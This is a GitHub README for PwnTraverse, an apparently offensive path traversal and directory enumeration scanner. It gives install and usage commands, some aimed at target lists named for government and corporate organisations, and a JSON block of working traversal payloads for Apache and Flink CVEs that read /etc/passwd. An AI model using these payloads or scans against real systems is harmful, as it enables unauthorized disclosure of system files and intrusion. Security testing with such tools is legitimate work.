Skip to content

PwnTraverse, An advanced path traversal & endpoint vulnerability scanner for security researchers, bug bounty hunters, and penetration testers. Detects path traversal flaws, performs deep directory enumeration, and identifies CVE-related issues automatically.

License

odaysec/PwnTraverse

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PwnTraverse Logo

PwnTraverse is an advanced Path Traversal & Endpoint Vulnerability Scanner designed for security researchers, bug bounty hunters, and penetration testers. This tool automates the discovery of Path Traversal vulnerabilities and related CVEs, helping security professionals quickly assess and report security issues.

CLI Python PwnTraverse


Key Features

  • Automated Path Traversal Detection
    Scans and detects path traversal vulnerabilities using a variety of payloads (../, double-encoding, bypass tricks).

  • Deep Directory Enumeration
    Performs intelligent directory brute-forcing to uncover hidden files and endpoints.

  • CVE & Endpoint Mapping
    Correlates discovered endpoints with known CVEs and potential LFI/RCE attack surfaces.

  • Clean & Actionable Reports
    Generates structured vulnerability reports for easy documentation and bug bounty submission.

Installation

  1. Clone the Repository
git clone https://github.com/odaysec/PwnTraverse.git
cd PwnTraverse
  1. Install Dependencies Ensure you have Python 3.x installed, then run:
pip install -r requirements.txt
  1. (Optional) Create a Virtual Environment
python3 -m venv pwntraverse-venv
source pwntraverse-venv/bin/activate   # Linux / MacOS
.\pwntraverse-venv\Scripts\activate   # Windows

Usage

Run the scanner with:

python3 exploit.py --url https://target.com --wordlist wordlists/common.txt
python exploit.py --file gov.txt --thread 15
python exploit.py --file tesla.txt --ssl
python exploit.py --range 192.168.15.1,192.168.15.100 --thread 30
python exploit.py --file fbi.txt --thread 15 --timeout 3
python exploit.py --file gov.txt --debug

Available options:

  • --url → Target URL
  • --wordlist → Custom wordlist for directory enumeration
  • --threads → Number of threads (default: 10)
  • --output → Save results to file (JSON/HTML)

asciicast

Output

[+] Testing target: https://target.com
[+] Found potential path traversal: https://target.com/download?file=../../../../etc/passwd
[+] CVE-2022-12345 matched for endpoint: /download
[+] Report saved to: reports/scan-2025-09-21.html

Roadmap

  • Add more traversal payloads (double URL encoding, UTF-16 bypass)
  • Add Burp Suite plugin integration
  • Generate PDF reports

Exploit Payloads

File: assets/exploits.json

{
    "CVE-2021-41773": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "CVE-2021-42013-0": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd",
    "CVE-2020-17519-0": "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
}

References Payloads: PayloadAllTheThings

⚠️ Disclaimer

This project is for educational and security research purposes only.
Do not use it against systems without prior authorization.

The author(s) are not responsible for any damage caused by misuse of this tool,
including but not limited to data loss, system compromise, or legal consequences.
By using this tool, you agree to take full responsibility for your actions.

Star History Chart

About

PwnTraverse, An advanced path traversal & endpoint vulnerability scanner for security researchers, bug bounty hunters, and penetration testers. Detects path traversal flaws, performs deep directory enumeration, and identifies CVE-related issues automatically.

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages